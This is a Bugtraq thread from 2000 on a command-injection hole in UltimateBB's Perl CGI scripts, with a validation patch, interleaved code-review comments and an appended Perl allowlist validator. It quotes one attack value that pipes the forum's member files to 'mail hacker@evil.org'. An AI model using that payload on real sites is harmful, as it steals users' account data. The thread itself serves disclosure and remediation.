[13933] in bugtraq
Re: perl-cgi hole in UltimateBB by Infopop Corp.
daemon@ATHENA.MIT.EDU (Irwin Lazar)
Fri Feb 18 20:45:27 2000
Date: Thu, 17 Feb 2000 07:24:30 -0700
Reply-To: Irwin Lazar <ILazar@TBG.COM>
From: Irwin Lazar <ILazar@TBG.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
According to the folks at UBB, the latest version, 5.43d, fixes this
vulnerability. Has anyone been able to verify if this is in fact correct?
Irwin
> -----Original Message-----
> From: Jordan Ritter [mailto:jpr5@BOS.BINDVIEW.COM]
> Sent: Tuesday, February 15, 2000 8:48 PM
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: Re: perl-cgi hole in UltimateBB by Infopop Corp.
>
>
> On Mon, 14 Feb 2000, Kevin Hillabolt wrote:
>
> # It works on the full version also...
> #
> # Little different syntax:
> # topic=012345.cgi|cat%20../Members/*|mail hacker@evil.org|
> # (note the ../ on the Members. You have to go up a directory to get the
> # file. Maybe you could stop it via simple folder permissions??)
>
> Provided with no warranty. unescape() borrowed from the far superior
> CGI.pm. It appears to work, but I haven't checked it for completeness.
>
> The ubb scripts are a programming disaster, and pass around metachars and
> filenames through form parameters, making input validation difficult.
> The patch below selectively validates input based on the name of the
> variable we're validating (i.e. only certain variables are dangerous;
> others are just dumb and not a risk). It's better to try and validate at
> the top level than code review the source and try to patch every idiotic
> mistake that was made. At the very least, this stops the specific attack
> that was posted. There could be other holes that this doesn't cover, or
> alternative ways to carry out the same attack. Hopefully Infopop will get
> their act together soon.
>
> I can't believe they distribute this crap as commercial software.
> Actually, what I can't believe is how many people paid for it. God help
> us all.
>
>
> --jordan
>
>
> $ diff ubb_library.pl ubb_library.pl.orig
> 84,93d83
> < # unescape URL-encoded data
> < sub unescape {
> < shift() if ref($_[0]);
> < my $todecode = shift;
> < return undef unless defined($todecode);
> < $todecode =~ tr/+/ /; # pluses become spaces
> < $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;
> < return $todecode;
> < }
> <
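Review bot: this diff was produced as `diff ubb_library.pl ubb_library.pl.orig`, patched file first, so the `<` lines in every hunk are the additions and the output has to be applied reversed (`patch -R`, or re-run `diff` with the operands swapped); worth stating so nobody deletes the new `unescape` sub instead of adding it. Inside the sub, `return undef unless defined($todecode);` returns a one-element list in list context, so a caller writing `my @v = &unescape($x)` gets a true list for undefined input; a bare `return` is the usual fix. Since the sub is a copy of CGI.pm's, `use CGI ();` and `CGI::unescape($val)` would avoid carrying the copy (CGI.pm has shipped with core Perl since 5.004).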
> 1047a1038
> >
> 1112,1120d1102
> < # clean input
> < if ($key =~ /^(forum|topic|number|replynum)$/i) {
> < my($newval) = &unescape($val);
> <
> < if ($newval !~ /^([ -\@\w.]+)$/) {
> < $val = "bad_input";
> < }
> < }
> <
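Review bot: the allowlist `/^([ -\@\w.]+)$/` is much wider than it looks: ` -\@` is a character range from space (0x20) to `@` (0x40), which admits every punctuation character in between (`;`, `&` and `$` among them), so of the shell metacharacters only `|`, the backtick and a handful of others above `@` are actually excluded. For the parameters named here (`forum`, `topic`, `number`, `replynum`) a value such as `012345.cgi` needs nothing beyond `\w` and `.`, so `/\A[\w.]+\z/` is the safer pattern; `\z` rather than `$` also matters, because `$` matches before a trailing newline and a value ending in `%0A` passes the current check. Separately, substituting the string `bad_input` lets the request continue with a name that does not exist; aborting the request with an error fails closed.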
> 1266,1284d1247
> <
> < my(@out);
> < foreach $row (@in) {
> < my($name,$value) = split ("=", $row);
> <
> < if ($name =~ /^(forum|topic|number|replynum)$/i) {
> < my($newvalue) = &unescape($value);
> <
> < if ($newvalue !~ /^([ -\@\w.]+)$/) {
> < $value = "bad_input";
> < }
> <
> < push @out, "$name=$value";
> < } else {
> < push @out, $row;
> < }
> < }
> < @in = @out;
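Review bot: this block repeats the check from the 1112 hunk verbatim (same name list, same pattern); factoring both into one `clean_param($name, $value)` sub would keep the two code paths from drifting when the pattern is tightened. Two smaller points: `my($name,$value) = split ("=", $row);` gets an implicit LIMIT of 3 from the two-element assignment, so anything after a second `=` in a matched row is silently dropped when the row is rebuilt as `"$name=$value"`; `split("=", $row, 2)` preserves it. And `$row` in `foreach $row (@in)` is a package global rather than a lexical; `foreach my $row (@in)` is idiomatic.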
>
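As an added example, not code from this thread or from Infopop's UBB: the per-parameter allowlist approach Jordan describes, written as a stand-alone Perl query parser that decodes before validating, anchors with `\A` and `\z`, and rejects the request instead of substituting a sentinel. The parameter names are the ones in the patch; the patterns, the `parse_query` helper and the sample inputs are assumptions constructed here, not UBB's real value formats.

```perl
#!/usr/bin/perl
# Added example (not part of the Bugtraq thread or of UBB): a per-parameter
# allowlist validator for CGI input. Only parameters that end up in file
# paths or open() arguments are checked; everything else passes through.
use strict;
use warnings;

# Allowlist keyed by parameter name. The patterns are assumptions about what
# the application needs, chosen as narrowly as the sample values allow.
my %ALLOW = (
    forum    => qr/\A[A-Za-z0-9_]{1,32}\z/,   # e.g. "Forum3"
    topic    => qr/\A[0-9]{6}\.cgi\z/,        # e.g. "012345.cgi"
    number   => qr/\A[0-9]{1,9}\z/,
    replynum => qr/\A[0-9]{1,9}\z/,
);

# URL-decode one value (the same transformation CGI.pm's unescape performs).
sub unescape {
    my ($s) = @_;
    return unless defined $s;          # bare return: empty list in list context
    $s =~ tr/+/ /;                     # pluses become spaces
    $s =~ s/%([0-9a-fA-F]{2})/chr(hex($1))/ge;
    return $s;
}

# Parse "a=b&c=d" into a hash, validating each allowlisted name against the
# DECODED value. Returns (\%params, undef) on success and (undef, $message)
# on the first rejected parameter, so the caller can fail closed.
sub parse_query {
    my ($query) = @_;
    my %params;
    for my $pair (split /[&;]/, $query) {
        my ($name, $value) = split /=/, $pair, 2;   # limit 2 keeps '=' in values
        next unless defined $name && length $name;
        $value = unescape(defined $value ? $value : '');
        $name  = lc(unescape($name));
        if (my $re = $ALLOW{$name}) {
            return (undef, "rejected parameter '$name'") unless $value =~ $re;
        }
        $params{$name} = $value;
    }
    return (\%params, undef);
}

# Constructed sample inputs: a legitimate request, a topic carrying a decoded
# pipe (the shape of the posted attack), and a topic with a trailing newline,
# which an unanchored '$' would have let through.
for my $q ("forum=Forum3&topic=012345.cgi&number=7",
           "forum=Forum3&topic=012345.cgi%7C",
           "forum=Forum3&topic=012345.cgi%0A") {
    my ($p, $err) = parse_query($q);
    if ($err) {
        print "REJECT $q: $err\n";
    } else {
        print "ACCEPT topic=$p->{topic} number=$p->{number}\n";
    }
}
```

The validator runs on the decoded value but stores the decoded value too, so there is no second decoding step downstream that could reintroduce a rejected character; in UBB's layout, where the decoding happens later, the check would instead decode a copy, as the patch does, and leave the stored value alone.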